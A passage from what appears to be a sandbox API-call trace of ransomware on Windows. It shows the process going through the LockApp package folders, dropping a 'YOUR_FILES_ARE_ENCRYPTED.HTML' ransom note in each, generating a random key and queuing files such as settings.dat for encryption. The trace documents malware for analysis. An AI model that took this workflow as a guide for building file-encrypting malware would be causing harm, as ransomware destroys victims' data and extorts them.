dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0116.028] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.030] CloseHandle (hObject=0x32c) returned 1 [0116.030] GetProcessHeap () returned 0x600000 [0116.030] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.030] GetProcessHeap () returned 0x600000 [0116.030] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.030] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62527d6a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x62527d6a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x62527d6a, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0116.030] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.030] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\RoamingState") returned 93 [0116.030] GetProcessHeap () returned 0x600000 [0116.030] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.030] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\RoamingState" [0116.030] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\RoamingState\\*" [0116.030] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62527d6a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x62527d6a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x62527d6a, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x626838 [0116.031] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62527d6a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x62527d6a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x62527d6a, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0116.031] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62527d6a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x62527d6a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x62527d6a, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 0 [0116.031] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0116.031] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0116.031] GetProcessHeap () returned 0x600000 [0116.031] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.031] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.lockapp_cw5n1h2txyewy\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0116.033] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.034] CloseHandle (hObject=0x32c) returned 1 [0116.034] GetProcessHeap () returned 0x600000 [0116.034] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.034] GetProcessHeap () returned 0x600000 [0116.034] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.036] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62658fa1, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x62717b51, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x62717b51, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0116.036] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.036] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Settings") returned 89 [0116.036] GetProcessHeap () returned 0x600000 [0116.036] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.037] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Settings" [0116.037] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Settings\\*" [0116.037] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62658fa1, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x62717b51, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x91e019c3, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x626638 [0116.044] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62658fa1, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x62717b51, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x91e019c3, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0116.044] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6273dda0, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6273dda0, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6273dda0, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0116.044] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.044] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Settings\\roaming.lock") returned 102 [0116.044] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0116.044] lstrlenW (lpString=".lock") returned 5 [0116.044] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0116.044] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62717b51, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x9246a026, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x9246a026, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0116.044] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.044] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Settings\\settings.dat") returned 102 [0116.044] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0116.044] lstrlenW (lpString=".dat") returned 4 [0116.044] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0116.045] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0116.045] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.lockapp_cw5n1h2txyewy\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x320 [0116.045] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0116.045] GetProcessHeap () returned 0x600000 [0116.045] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0116.048] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="35") returned 2 [0116.048] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="5D") returned 2 [0116.048] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="C7") returned 2 [0116.048] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="D6") returned 2 [0116.048] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="EF") returned 2 [0116.048] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="6F") returned 2 [0116.048] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="0E") returned 2 [0116.048] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="C2") returned 2 [0116.048] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="D4") returned 2 [0116.048] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="D8") returned 2 [0116.048] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="15") returned 2 [0116.049] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="9A") returned 2 [0116.049] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="45") returned 2 [0116.049] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="95") returned 2 [0116.049] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="01") returned 2 [0116.049] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="C9") returned 2 [0116.049] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="AF") returned 2 [0116.049] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="70") returned 2 [0116.049] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="07") returned 2 [0116.049] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="1D") returned 2 [0116.049] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="61") returned 2 [0116.049] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="D5") returned 2 [0116.049] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="A2") returned 2 [0116.049] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="51") returned 2 [0116.049] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="70") returned 2 [0116.049] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="FC") returned 2 [0116.049] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="31") returned 2 [0116.049] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="E4") returned 2 [0116.049] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="9A") returned 2 [0116.049] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="71") returned 2 [0116.049] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="84") returned 2 [0116.049] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="1A") returned 2 [0116.050] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Settings\\settings.dat" [0116.050] CreateIoCompletionPort (FileHandle=0x320, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0116.050] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0116.050] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x91cf695a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x91cf695a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x91cf695a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0116.050] StrStrIW (lpFirst="settings.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.050] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Settings\\settings.dat.LOG1") returned 107 [0116.050] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0116.050] lstrlenW (lpString=".LOG1") returned 5 [0116.050] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0116.050] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x91cf695a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x91cf695a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x91cf695a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0116.050] StrStrIW (lpFirst="settings.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.050] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Settings\\settings.dat.LOG2") returned 107 [0116.050] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0116.050] lstrlenW (lpString=".LOG2") returned 5 [0116.050] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0116.050] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x91cf695a, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x91cf695a, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x91cf695a, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0116.050] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0116.050] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 [0116.050] GetProcessHeap () returned 0x600000 [0116.050] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.051] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.lockapp_cw5n1h2txyewy\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0116.051] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.052] CloseHandle (hObject=0x32c) returned 1 [0116.053] GetProcessHeap () returned 0x600000 [0116.053] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.053] GetProcessHeap () returned 0x600000 [0116.053] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.053] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62717b51, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x62717b51, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x62717b51, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0116.053] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.053] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\SystemAppData") returned 94 [0116.053] GetProcessHeap () returned 0x600000 [0116.053] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.054] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\SystemAppData" [0116.054] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\SystemAppData\\*" [0116.054] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62717b51, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x62717b51, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x62717b51, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x626638 [0116.054] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62717b51, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x62717b51, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x62717b51, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0116.054] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62717b51, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x62717b51, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x62717b51, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 0 [0116.054] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0116.055] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 124 [0116.055] GetProcessHeap () returned 0x600000 [0116.055] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.055] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.lockapp_cw5n1h2txyewy\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0116.055] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.056] CloseHandle (hObject=0x32c) returned 1 [0116.056] GetProcessHeap () returned 0x600000 [0116.056] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.056] GetProcessHeap () returned 0x600000 [0116.056] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.057] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62574156, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x62574156, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x62574156, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0116.057] StrStrIW (lpFirst="TempState", 